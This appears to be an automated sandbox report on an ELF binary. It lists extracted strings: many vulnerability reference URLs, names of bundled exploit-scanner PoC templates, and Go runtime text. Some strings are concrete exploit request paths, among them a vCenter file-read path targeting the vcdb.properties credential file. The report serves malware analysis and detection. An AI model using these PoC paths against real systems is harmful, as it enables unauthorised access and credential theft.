Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/Fl2hSO-y60VsTi5YJFyl0w
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/HFug1khyfHmCujhc_Gm_yQ
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8A
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/Ttpe63H9lQe87Uk0VOyMFw
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQname:
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/ZwhBEz2ek26Zf3F-csoRgQ
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/jgNyTHSqWA5twyk5tfSQUQ
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/qIAcycsO_L9JKisG5Bgg_w
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/sulJSg0Ru138oASiI5cYAA
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93gname:
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s?__biz=MzAxODg1MDMwOQ==&mid=2247489109&idx=1&sn=0c9a3388e4ac1389897b4449fb
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d9
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c7
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247488978&idx=1&sn=c0a5369f2b374dcef0bbf61b92
Source: na.elfString found in binary or memory: https://mrxn.net/Infiltration/323.html
Source: na.elfString found in binary or memory: https://my.oschina.net/u/4581879/blog/4753320name:
Source: na.elfString found in binary or memory: https://nifi.apache.org/docs/nifi-docs/rest-api/index.html
Source: na.elfString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2018-17246
Source: na.elfString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2019-16312name:
Source: na.elfString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2019-8442
Source: na.elfString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2020-27986
Source: na.elfString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2020-3452
Source: na.elfString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2020-35736
Source: na.elfString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2020-7980
Source: na.elfString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2020-8209
Source: na.elfString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2021-41773
Source: na.elfString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2022-26134
Source: na.elfString found in binary or memory: https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html
Source: na.elfString found in binary or memory: https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.h
Source: na.elfString found in binary or memory: https://paper.seebug.org/1485/name:
Source: na.elfString found in binary or memory: https://paper.seebug.org/1489
Source: na.elfString found in binary or memory: https://paper.seebug.org/567/
Source: na.elfString found in binary or memory: https://paper.seebug.org/676/name:
Source: na.elfString found in binary or memory: https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
Source: na.elfString found in binary or memory: https://phyb0x.github.io/2018/10/09/seacms%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90/nam
Source: na.elfString found in binary or memory: https://pivotal.io/security/cve-2020-5405
Source: na.elfString found in binary or memory: https://poc.shuziguanxing.com/#/publicIssueInfo#issueId=4210
Source: na.elfString found in binary or memory: https://print1n.top)
Source: na.elfString found in binary or memory: https://print1n.top/post/Other/TamronOS_IPTV%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E5%89%8D%E5%8F%B0%E
Source: na.elfString found in binary or memory: https://quake.360.cn/quake/#/vulDetail/QH-202006-1954/checked
Source: na.elfString found in binary or memory: https://s.tencent.com/research/bsafe/1156.html
Source: na.elfString found in binary or memory: https://s.tencent.com/research/bsafe/1228.html
Source: na.elfString found in binary or memory: https://s.tencent.com/research/bsafe/474.htmlname:
Source: na.elfString found in binary or memory: https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%
Source: na.elfString found in binary or memory: https://seclists.org/oss-sec/2021/q3/188
Source: na.elfString found in binary or memory: https://securityaffairs.co/wordpress/91689/hacking/unpatched-critical-0-day-vbulletin.html
Source: na.elfString found in binary or memory: https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
Source: na.elfString found in binary or memory: https://share.zabbix.com/
Source: na.elfString found in binary or memory: https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/
Source: na.elfString found in binary or memory: https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2
Source: na.elfString found in binary or memory: https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/
Source: na.elfString found in binary or memory: https://support.citrix.com/article/CTX276688
Source: na.elfString found in binary or memory: https://support.f5.com/csp/article/K03009991
Source: na.elfString found in binary or memory: https://support.f5.com/csp/article/K23605346
Source: na.elfString found in binary or memory: https://support.f5.com/csp/article/K52145254
Source: na.elfString found in binary or memory: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-
Source: na.elfString found in binary or memory: https://suzzz112113.github.io/#blog)
Source: na.elfString found in binary or memory: https://swarm.ptsecurity.com/unauth-rce-vmware/name:
Source: na.elfString found in binary or memory: https://t.co/LfvbyBUhF5
Source: na.elfString found in binary or memory: https://tom0li.github.io/)
Source: na.elfString found in binary or memory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB
Source: na.elfString found in binary or memory: https://twitter.com/ptswarm/status/1318914772918767619
Source: na.elfString found in binary or memory: https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-fr
Source: na.elfString found in binary or memory: https://vulhub.org/#/environments/jupyter/notebook-rce/
Source: na.elfString found in binary or memory: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
Source: na.elfString found in binary or memory: https://we1x4n.com/)
Source: na.elfString found in binary or memory: https://we1x4n.github.io/)
Source: na.elfString found in binary or memory: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
Source: na.elfString found in binary or memory: https://www.anquanke.com/post/id/168991name:
Source: na.elfString found in binary or memory: https://www.anquanke.com/post/id/183241
Source: na.elfString found in binary or memory: https://www.anquanke.com/post/id/187923
Source: na.elfString found in binary or memory: https://www.anquanke.com/post/id/232748
Source: na.elfString found in binary or memory: https://www.anquanke.com/vul/id/1150798name:
Source: na.elfString found in binary or memory: https://www.anquanke.com/vul/id/1674598
Source: na.elfString found in binary or memory: https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
Source: na.elfString found in binary or memory: https://www.cnblogs.com/-mo-/p/11295400.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/-qing-/p/10889467.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/0day-li/p/13650452.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/0daybug/p/12786036.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/17bdw/p/11840588.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/EasonJim/p/6859345.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/Spec/p/10718046.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/T0uch/p/14475551.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/ffx1/p/12653597.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/jinqi520/p/10202615.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/jinqi520/p/11596500.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/magic-zero/p/12641068.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/milantgh/p/3615986.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/potatsoSec/p/13437713.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/rebeyond/p/4951418.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/sallyzhang/p/12457031.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/test404/p/7397755.htmlname:
Source: na.elfString found in binary or memory: https://www.cnblogs.com/wishwzp/p/9438658.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/wyb628/p/8567610.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/xiaoxiaoleo/p/6360260.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/xiexiandong/p/12888582.html
Source: na.elfString found in binary or memory: https://www.cnblogs.com/yuzly/p/11255609.html
Source: na.elfString found in binary or memory: https://www.cnvd.org.cn/flaw/show/2025171
Source: na.elfString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205
Source: na.elfString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603name:
Source: na.elfString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
Source: na.elfString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2019-22239
Source: na.elfString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2020-57264
Source: na.elfString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422
Source: na.elfString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2020-67113
Source: na.elfString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2021-04128name:
Source: na.elfString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2021-34568
Source: na.elfString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2021-39012name:
Source: na.elfString found in binary or memory: https://www.cnvd.org.cn/patchInfo/show/192993
Source: na.elfString found in binary or memory: https://www.du1x3r12.com
Source: na.elfString found in binary or memory: https://www.exploit-db.com/exploits/38797
Source: na.elfString found in binary or memory: https://www.exploit-db.com/exploits/40211name:
Source: na.elfString found in binary or memory: https://www.exploit-db.com/exploits/43974
Source: na.elfString found in binary or memory: https://www.exploit-db.com/exploits/44160
Source: na.elfString found in binary or memory: https://www.exploit-db.com/exploits/44495/
Source: na.elfString found in binary or memory: https://www.exploit-db.com/exploits/46073
Source: na.elfString found in binary or memory: https://www.exploit-db.com/exploits/46074
Source: na.elfString found in binary or memory: https://www.exploit-db.com/exploits/46227
Source: na.elfString found in binary or memory: https://www.exploit-db.com/exploits/47465
Source: na.elfString found in binary or memory: https://www.exploit-db.com/exploits/47467name:
Source: na.elfString found in binary or memory: https://www.exploit-db.com/exploits/47774
Source: na.elfString found in binary or memory: https://www.exploit-db.com/exploits/48698
Source: na.elfString found in binary or memory: https://www.freebuf.com/column/214946.htmlname:
Source: na.elfString found in binary or memory: https://www.freebuf.com/news/196993.html
Source: na.elfString found in binary or memory: https://www.freebuf.com/vuls/152058.html
Source: na.elfString found in binary or memory: https://www.freebuf.com/vuls/152058.htmlname:
Source: na.elfString found in binary or memory: https://www.freebuf.com/vuls/155753.html
Source: na.elfString found in binary or memory: https://www.freebuf.com/vuls/181814.html
Source: na.elfString found in binary or memory: https://www.freebuf.com/vuls/214767.htmlname:
Source: na.elfString found in binary or memory: https://www.freebuf.com/vuls/217586.html
Source: na.elfString found in binary or memory: https://www.hackbug.net/archives/111.html
Source: na.elfString found in binary or memory: https://www.hacking8.com/bug-web/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B-GRP-u8%E6%B3%A8%E5%85%A5%E6%B
Source: na.elfString found in binary or memory: https://www.hedysx.com/2777.html
Source: na.elfString found in binary or memory: https://www.jianshu.com/p/8d878330a42f
Source: na.elfString found in binary or memory: https://www.kingkk.com/)
Source: na.elfString found in binary or memory: https://www.ld-fcw.com/
Source: na.elfString found in binary or memory: https://www.linuxlz.com/aqld/2309.html
Source: na.elfString found in binary or memory: https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371name:
Source: na.elfString found in binary or memory: https://www.ohlinge.cn)
Source: na.elfString found in binary or memory: https://www.onebug.org/wooyundata/65458.html
Source: na.elfString found in binary or memory: https://www.oracle.com/security-alerts/alert-cve-2020-14750.html
Source: na.elfString found in binary or memory: https://www.pwnwiki.org/index.php?title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_get_detail_view.php_%
Source: na.elfString found in binary or memory: https://www.ruijie.com.cn/gy/xw-aqtg-gw/86747/
Source: na.elfString found in binary or memory: https://www.runoob.com/mongodb/working-with-rockmongo.htmlname:
Source: na.elfString found in binary or memory: https://www.secpulse.com/archives/107611.htmlname:
Source: na.elfString found in binary or memory: https://www.secpulse.com/archives/39144.html
Source: na.elfString found in binary or memory: https://www.secpulse.com/archives/47690.html
Source: na.elfString found in binary or memory: https://www.secpulse.com/archives/496.htmlname:
Source: na.elfString found in binary or memory: https://www.secquan.org/Prime/1069179name:
Source: na.elfString found in binary or memory: https://www.seebug.org/vuldb/ssvid-91597name:
Source: na.elfString found in binary or memory: https://www.seebug.org/vuldb/ssvid-91762
Source: na.elfString found in binary or memory: https://www.seebug.org/vuldb/ssvid-96562
Source: na.elfString found in binary or memory: https://www.seebug.org/vuldb/ssvid-97265
Source: na.elfString found in binary or memory: https://www.seebug.org/vuldb/ssvid-97266
Source: na.elfString found in binary or memory: https://www.seebug.org/vuldb/ssvid-97267
Source: na.elfString found in binary or memory: https://www.seebug.org/vuldb/ssvid-97268
Source: na.elfString found in binary or memory: https://www.seebug.org/vuldb/ssvid-98364
Source: na.elfString found in binary or memory: https://www.seebug.org/vuldb/ssvid-99075
Source: na.elfString found in binary or memory: https://www.t00ls.net/articles-54436.html
Source: na.elfString found in binary or memory: https://www.t00ls.net/thread-53291-1-1.html
Source: na.elfString found in binary or memory: https://www.tenable.com/cve/CVE-2020-14181
Source: na.elfString found in binary or memory: https://www.tensorflow.org/guide/summaries_and_tensorboard?hl=zh-CN
Source: na.elfString found in binary or memory: https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-kno
Source: na.elfString found in binary or memory: https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Resul
Source: na.elfString found in binary or memory: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabili
Source: na.elfString found in binary or memory: https://www.twilio.com/blog/2017/08/http-requests-in-node-js.htmlname:
Source: na.elfString found in binary or memory: https://www.uedbox.com/post/29340
Source: na.elfString found in binary or memory: https://www.uedbox.com/post/30019/
Source: na.elfString found in binary or memory: https://www.uedbox.com/post/35188/
Source: na.elfString found in binary or memory: https://www.uedbox.com/post/54561/
Source: na.elfString found in binary or memory: https://www.viddler.com/v/test
Source: na.elfString found in binary or memory: https://www.vmware.com/security/advisories/VMSA-2021-0004.html
Source: na.elfString found in binary or memory: https://www.weaver.com.cn/
Source: na.elfString found in binary or memory: https://www.weaver.com.cn/cs/securityDownload.asp
Source: na.elfString found in binary or memory: https://www.weaver.com.cn/cs/securityDownload.aspname:
Source: na.elfString found in binary or memory: https://www.zabbix.com/documentation/3.4/zh/manual/quickstart/login
Source: na.elfString found in binary or memory: https://www.zhihuifly.com/t/topic/3118
Source: na.elfString found in binary or memory: https://xz.aliyun.com/t/2224
Source: na.elfString found in binary or memory: https://xz.aliyun.com/t/2490
Source: na.elfString found in binary or memory: https://xz.aliyun.com/t/2828name:
Source: na.elfString found in binary or memory: https://xz.aliyun.com/t/2941
Source: na.elfString found in binary or memory: https://xz.aliyun.com/t/6103name:
Source: na.elfString found in binary or memory: https://xz.aliyun.com/t/6419
Source: na.elfString found in binary or memory: https://xz.aliyun.com/t/6453
Source: na.elfString found in binary or memory: https://xz.aliyun.com/t/6635name:
Source: na.elfString found in binary or memory: https://xz.aliyun.com/t/6708
Source: na.elfString found in binary or memory: https://xz.aliyun.com/t/7219
Source: na.elfString found in binary or memory: https://xz.aliyun.com/t/7877name:
Source: na.elfString found in binary or memory: https://xz.aliyun.com/t/8478#reply-15684
Source: na.elfString found in binary or memory: https://xz.aliyun.com/t/9016?page=1
Source: na.elfString found in binary or memory: https://y4er.com/post/metinfo7-sql-tips/#sql-injection-1name:
Source: na.elfString found in binary or memory: https://y4er.com/post/metinfo7-sql-tips/#sql-injection-2name:
Source: na.elfString found in binary or memory: https://yq.aliyun.com/articles/616757
Source: na.elfString found in binary or memory: https://yun.scdsjzx.cn/system/notice/detail/399d2dd0-94aa-4914-a8f6-e71f8dc8ac87
Source: na.elfString found in binary or memory: https://zhuanlan.zhihu.com/p/61215662Indicates
Source: na.elfString found in binary or memory: https://zhuanlan.zhihu.com/p/85265552
Source: classification engineClassification label: sus21.evad.linELF@0/0@2/0
Source: /usr/lib/snapd/snap-failure (PID: 5755)Systemctl executable: /usr/bin/systemctl -> systemctl stop snapd.socketJump to behavior
Source: /usr/lib/snapd/snap-failure (PID: 5736)Reads version info: /proc/versionJump to behavior
Source: na.elfBinary or memory string: - https://github.com/opsxcq/exploit-CVE-2014-6271name: poc-yaml-vmware-vrealize-cve-2021-21975-ssrf
Source: na.elfBinary or memory string: path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
Source: na.elfBinary or memory string: path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
Source: na.elfBinary or memory string: %sCONTENT_LENGTHCanada/CentralCanada/EasternCanada/PacificColumn Num: %dContent-LengthDATETIMEOFFSETDkim-SignatureERR_UNKNOWN_%dEurope/AndorraEurope/BelfastEurope/TallinnEurope/VaticanEurope/VilniusFieldsPresent:File not foundGC assist waitGC worker initGREATER_EQUALSGot portNum 0.INTERNAL_ERRORIndian/MayotteIndian/ReunionInstEmptyWidthInvalid NUMBERInvalid typeidLABEL_OPTIONALLABEL_REPEATEDLABEL_REQUIREDLL altSubSets=MAX_FRAME_SIZEMB; allocated MSSQLSvc/%s:%dMaster BrowserMatchATN mode Mexico/BajaSurMexico/GeneralNegotiateFlag(NetDDE ServiceNot AcceptableNot ComparableNot logged in.OracleClientGoOther_ID_StartPG_DDL_COMMANDPROTOCOL_ERRORPacific/EasterPacific/KosraePacific/MajuroPacific/MidwayPacific/NoumeaPacific/PonapePacific/SaipanPacific/TahitiPacific/TarawaPacific/WallisPattern_SyntaxQuotation_MarkRCodeNameErrorREAD COMMITTEDREFUSED_STREAMREQUEST_METHODRead CommittedRead Lob Data:ReservedRangesResourceHeaderSET FMTONLY ONSIGABRT: abortStack is emptyUS/Pacific-NewUnable to readVMware vSphereXXX_OneofFuncs[-] no such sc\.+*?()|[]{}^$\[^?[^\[\]]+\]
Source: na.elfBinary or memory string: - https://www.vmware.com/security/advisories/VMSA-2021-0004.html
Source: na.elfBinary or memory string: name: poc-yaml-vmware-vcenter-arbitrary-file-read
Source: na.elfBinary or memory string: - https://swarm.ptsecurity.com/unauth-rce-vmware/name: poc-yaml-joomla-component-vreview-sql
Source: na.elfBinary or memory string: name: poc-yaml-CVE-2022-22954-VMware-RCE
Source: na.elfBinary or memory string: The cluster network was not found.The cluster node is not reachable.The network responded incorrectly.The operation cannot be performed.The protocol driver %1 is invalid.The specified OID cannot be found.The tape could not be partitioned.Too many SIDs have been specified.Unhandled saveSessionInfo type 0x%[-] Hash is error,hex decode error" is anonymous but has PkgPath set\(\s*HOST\s*=\s*([A-z0-9._%+-]+)\)adding nil Certificate to CertPoolarray of non-uint8 in field %d: %Tattempted to parse unknown event: bad tag in lazy extension decodingcan't parse %q as a decimal numberchacha20: wrong HChaCha20 key sizeconnection doesn't support Ed25519control characters are not allowedcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusdid not expect port number to be 0did not find expected node contentdiffie-hellman-group-exchange-sha1doaddtimer: P already set in timerdriver: remove argument from queryduration (%v) exceeds +10000 yearsduration (%v) exceeds -10000 yearsexecutable file not found in $PATHexpected an RSA public key, got %Texpected comma after array elementfailed to construct HKDF label: %sfailed to login with anonymous: %sfdw_dynamic_parameter_value_neededfdw_unable_to_establish_connectionflag provided but not defined: -%sforEachP: sched.safePointWait != 0frame_settings_window_size_too_bigframe_windowupdate_zero_inc_streamfunction already has a binding: %sgoogle.protobuf.Value.number_valuehttp2: aborting request body writehttp: MultipartReader called twicehttp: persistConn.readLoop exitinghttp: read on closed response bodyillegal base64 data at input byte in \u hexadecimal character escapeinvalid length of a UTF-8 sequenceinvalid nested repetition operatorinvalid operation on closed objectinvalid or unsupported Perl syntaxinvalid padding bits in BIT STRINGinvalid_xml_processing_instructionmismatching field: got %v, want %vmspan.ensureSwept: m is not lockedno available servers to connect tonot implemented for read-only setsout of memory allocating allArenasoverload already has a binding: %spocs/CVE-2022-22954-VMware-RCE.ymlpocs/Hotel-Internet-Manage-RCE.ymlpocs/activemq-default-password.ymlpocs/confluence-cve-2021-26084.ymlpocs/dedecms-cve-2018-7700-rce.ymlpocs/discuz-wooyun-2010-080723.ymlpocs/drupal-cve-2014-3704-sqli.ymlpocs/ecology-javabeanshell-rce.ymlpocs/ecology-syncuserinfo-sqli.ymlpocs/f5-tmui-cve-2020-5902-rce.ymlpocs/joomla-cve-2015-7297-sqli.ymlpocs/joomla-cve-2017-8917-sqli.ymlpocs/nsfocus-uts-password-leak.ymlpocs/phpunit-cve-2017-9841-rce.ymlpocs/rabbitmq-default-password.ymlpocs/ruoyi-management-fileread.ymlpocs/seeyon-wooyun-2015-148227.ymlpocs/solarwinds-cve-2020-10148.ymlpocs/spon-ip-intercom-ping-rce.ymlpocs/springboot-cve-2021-21234.ymlpocs/springcloud-cve-2019-3799.ymlpocs/tomcat-cve-2017-12615-rce.ymlpocs/webmin-cve-2019-15107-rce.ymlpocs/yonyou-grp-u8-sqli-to-rce.ymlprohibited_sql_statement_attemptedreflect.FuncOf: too many argumentsreflect.
Source: na.elfBinary or memory string: |i18ninit.min.js)): IPv6 zones cannot be present in a prefix*[]TimeStamp parameter need time.Time value*[]time.Time parameter need time.Time valueA device that does not exist was specified.A monitor descriptor could not be obtained.A requested opened file is not a directory.A security package-specific error occurred.A translator failed to translate resources.An I/O adapter hardware error has occurred.An invalid volume label has been specified.CONNECTION TIMEOUT value must be an integerCommand not implemented for that parameter.DFS is unavailable on the contacted server.Debugger printed an exception on control C.Error enabling Transport HTTP/2 support: %vIPsec dropped a packet due to DOS throttle.No protocol sequences have been registered.Short names are not enabled on this volume.The RPC protocol sequence is not supported.The binding does not contain an entry name.The binding handle is not the correct type.The device will not start without a reboot.The file server is temporarily unavailable.The referenced assembly could not be found.The requested operation requires elevation.The requested print file has been canceled.The resume flag to a timer API was ignored.The specified process is not part of a job.The specified transition type is not valid.The system does not support RAID-5 volumes.The volume change journal is being deleted.There are no EFS keys defined for the user.Transport: unhandled response frame type %TUnmarshalling TreeDisconnect response for [[]byte col/par requires []byte or nil valueanypb.UnmarshalNew() failed for type %q: %vbufio: tried to rewind past start of buffercannot merge unrelated functions. %s and %scipher: incorrect nonce length given to CCMdependent_privilege_descriptors_still_existdid not find expected comment or line breakedwards25519: invalid point encoding lengthexec: WaitDelay expired before I/O completeexplicit time type given to non-time memberfailed to convert tvp parameter row col: %sfile %q has a package name conflict over %vfound character that cannot start any tokenfound invalid Unicode character escape codefound unexpected non-alphabetical characterfunction %s must have at least one overloadgcBgMarkWorker: unexpected gcMarkWorkerModegrew heap, but no adequate free space foundhttp2: too many 1xx informational responseshttp2: unexpected ALPN protocol %q; want %qinterrupted system call should be restartedisolation level is not supported or unknownmethodValueCallFrameObjs is not in a modulems17010 invalid session setup AndX responsemssql: invalid type for float column: %T %smult64bitPow10: power of 10 is out of rangemultiple Read calls return no data or errornet/http: invalid header field value for %qnet/http: timeout awaiting response headersno multipart boundary param in Content-Typenon in-use span found with specials bit setpocs/apache-kylin-unauth-cve-2020-13937.ymlpocs/chinaunicom-modem-default-password.ymlpocs/e-office-v9-upload-cnvd-2021-49104.ymlpocs/huawei-home-gateway-hg659-fileread.ymlpocs/powercreato
Source: na.elfBinary or memory string: description: "CVE-2022-22954-VMware-RCE by chaosec
Source: na.elfBinary or memory string: description: "vmware vCenter unauth RCE cve-2021-21985"
Source: na.elfBinary or memory string: _BYTEA_JSONB_MONEY_POINT_var%da11111a12345abc123acceptactiveadded allowatt_rcavx512base64bigintbinarybuffercallerchan<-closedcookiedbnamediscuzdoAuthdomaindoubledpanicefenceempty equalserrno error:exec: existsexpectfilterfolderglobalgopherhanguphash: headerimportin_mapinternip+netjstypekilledkrbspnlistenloggermembermethodminutendots:netdnsnumberobjectoffsetoptKeyoracleoriginpackedpopcntpq: %sproto2proto3qwe123rdrandrdseedrdtscpreadatremoverenameretValreturnrune1 scalarsecondseeyonselectsendtoserversilentsint32sint64size_tsmb2: socketsocks socks5splicesrvsvcsshkeysslkeystatfsstatusstderrstringstructsubstrsweep switchsyntaxsysmonsystemtelnettimersto_dyntoken(tongdauint16uint32uint64updatevarintvmwarewaitidweaverwebpocyaml: zabbix{user}
Source: na.elfBinary or memory string: %v.%s `oneof=%t`(HUAWEI ASG2050)(HUAWEI ASG2100)(HUAWEI SRG1220)(HUAWEI SRG2220)(HUAWEI SRG3250)(VMware vSphere)(libs.useso.com)(sessioncookie=), ctx dependent=, not a function. Reason was: %v.WithValue(type /etc/resolv.conf0123456789ABCDEF0123456789abcdef15:04:05.99999992384185791015625: value of type Africa/BujumburaAfrica/MogadishuAlready ReportedAmerica/AnguillaAmerica/AsuncionAmerica/BarbadosAmerica/DominicaAmerica/EdmontonAmerica/EnsenadaAmerica/MazatlanAmerica/MiquelonAmerica/MontrealAmerica/New_YorkAmerica/SantiagoAmerica/ShiprockAmerica/St_JohnsAmerica/St_KittsAmerica/St_LuciaAmerica/WinnipegAntarctica/CaseyAntarctica/DavisAntarctica/SyowaAsia/KrasnoyarskAsia/NovosibirskAsia/UlaanbaatarAsia/VladivostokAtlantic/BermudaAtlantic/MadeiraAtlantic/StanleyAustralia/DarwinAustralia/HobartAustralia/SydneyBrazil/DeNoronhaCitrix-ConfProxyCitrix-MetaframeCitrix-NetScalerCitrix-XenServerCitrix_NetscalerConn closed BRUHContent-EncodingContent-LanguageContent-Length: Duplicated key 'Europe/AmsterdamEurope/BucharestEurope/GibraltarEurope/LjubljanaEurope/StockholmFRAME_SIZE_ERRORGC scavenge waitGC worker (idle)GODEBUG: value "IBM-Lotus-DominoINDEX_AM_HANDLERImperial_AramaicIndian/ChristmasIndian/KerguelenIndian/MauritiusInstRuneAnyNotNLLANGUAGE_HANDLERMeroitic_CursiveMexico/BajaNorteMideast/Riyadh87Mideast/Riyadh88Mideast/Riyadh89Multiple ChoicesNETGEAR WNDR3600Not implemented!Other_AlphabeticPDU RecvFastPathPacific/AucklandPacific/FunafutiPacific/HonoluluPacific/JohnstonPacific/PitcairnPayment RequiredProxy-ConnectionRCodeFormatErrorREAD UNCOMMITTEDRead UncommittedReportAmbiguity SETTINGS_TIMEOUTSIGNONE: no trapServer Charset: SignatureScheme(Syntax error: %sTYPE_RDP_NEG_RSPUNIQUEIDENTIFIERUpgrade RequiredUser-Agent: %s
